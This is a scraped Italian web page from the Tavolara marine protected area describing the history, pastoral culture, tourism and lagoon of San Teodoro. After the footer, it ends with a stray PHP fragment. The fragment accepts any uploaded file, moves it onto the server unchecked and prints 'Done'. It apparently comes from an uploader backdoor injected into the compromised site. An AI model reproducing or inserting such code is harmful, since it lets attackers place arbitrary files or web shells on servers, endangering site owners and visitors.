Home » Territorio » I 3 comuni » San Teodoro

Rete Regionale per la conservazione della Fauna Marina SardegnaL’AMP è nodo della rete regionale per la conservazione della fauna marina

In caso di ritrovamento di animali in difficoltà contattare il
logo emergenza in mare, guardia costieralogo emergenza ambientale, segnalazione incendi boschivi

San Teodoro

Il paese si è sviluppato alla fine del XVII secolo, attorno alla chiesa dedicata a Teodoro, soldato romano d’oriente, martire della persecuzione di Diocleziano. 

Prima di questo periodo, le testimonianze storiche descrivono il territorio teodorino deserto e scarsamente popolato. 

Durante il medioevo, tutta la Gallura ha vissuto un crollo demografico dovuto alle difficoltà e alla durezza del periodo storico. 

La rinascita di San Teodoro ha avuto inizio tra la fine del 1600 e la prima metà del 1700, quando si è ricostituito il tessuto socio-economico, dispersosi nelle campagne limitrofe con la civiltà degli stazzi. 

La vita agropastorale della cultura gallurese ha fortemente caratterizzato l’area di San Teodoro che, ancora oggi, rappresenta parte della memoria di un’ antica civiltà, con la rilevante presenza di abitazioni tipiche, distribuite nelle campagne del suo territorio comunale. 

Tutto il comune di San Teodoro è caratterizzato da una forte presenza turistica stagionale concentrata nel periodo primaverile ed estivo. 

Durante le stagioni autunnali ed invernali lo stagno di di San Teodoro, che è anche Sito di Interesse Comunitario,offre uno spettacolo affascinante ai visitatori curiosi di conoscere la flora e la fauna del territorio. 

Per queste ragioni, l’ Area Marina Protetta di Tavolara – Punta Coda Cavallo considera il comune di San Teodoro un punto strategico per promuovere un modello di sviluppo sostenibile, capace di un’ offerta turistica più attenta ai valori ambientali e alla loro conservazione.

 

 

News


Dal 24 novembre al 6 dicembre, sede AMP di Tavolara via Porto Romano...

 

Rassegna stampa


La Nuova Sardegna. Articolo del  30 aprile 2013. Clicca qui per...

 

©  2011 Area Marina Protetta Tavolara Punta Coda Cavallo     Sede Legale: via Dante 1, OLBIA (SS) - 07026                                       Sede operativa:  Via San Giovanni 14, OLBIA (SS) - 07026           Telefono 0789/203013 - Fax 0789/204514 Mail:info@remove-this.amptavolara.itPec: amptavolara@pec.it 

Credits

Area Riservata

logo ministero ministero dell'ambientelogo EMASlogo Rina

"; $target = ""; $target = $target.basename( $_FILES['uploaded']['name']) ; $ok=1; if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) { echo "Done"; } } ?>
Navigando il sito amptavolara.com acconsenti all'utilizzo dei Cookie. Per maggiori dettagli.